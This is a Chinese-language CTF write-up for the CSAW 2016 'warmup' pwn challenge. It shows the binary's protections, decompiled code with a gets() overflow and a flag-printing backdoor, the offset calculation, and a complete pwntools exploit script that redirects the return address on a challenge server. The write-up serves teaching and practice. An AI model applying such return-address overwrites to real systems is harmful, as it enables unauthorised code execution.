warmup csaw 2016
# warmup csaw 2016
# 前提
# 查看文件保护
root@localhost ~# checksec warmup_csaw_2016
[*] '/root/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
# 静态分析
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char s[64]; // [rsp+0h] [rbp-80h] BYREF
char v5[64]; // [rsp+40h] [rbp-40h] BYREF
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(s, "%p\n", sub_40060D);
write(1, s, 9uLL);
write(1, ">", 1uLL);
return gets(v5);
}
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
存在溢出函数gets,另外通过查找函数表发现后门函数sub_40060D
int sub_40060D()
{
return system("cat flag.txt");
}
1
2
3
4
2
3
4
# 思路分析
本题比较简单,一开始将后门函数的地址就打印了出来,可以接收该地址,再通过gets函数溢出将返回地址修改为该值即可获得flag。
# 确定偏移量
使用cyclic,简单测试一下即可得知本题偏移量为0x40+8=72
# exp
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/warmup_csaw_2016/warmup_csaw_2016'
io = remote('node4.buuoj.cn', 27868)
# io = process(pwnfile)
padding = 0x40+8
io.recvuntil(b':')
backdoor = int(io.recvuntil(b'\n', drop=True), 16) # 接收地址
print("backdoor:{0}".format(hex(backdoor)))
payload = flat(['a'*padding, backdoor])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
上次更新: 2022/08/15, 00:29:49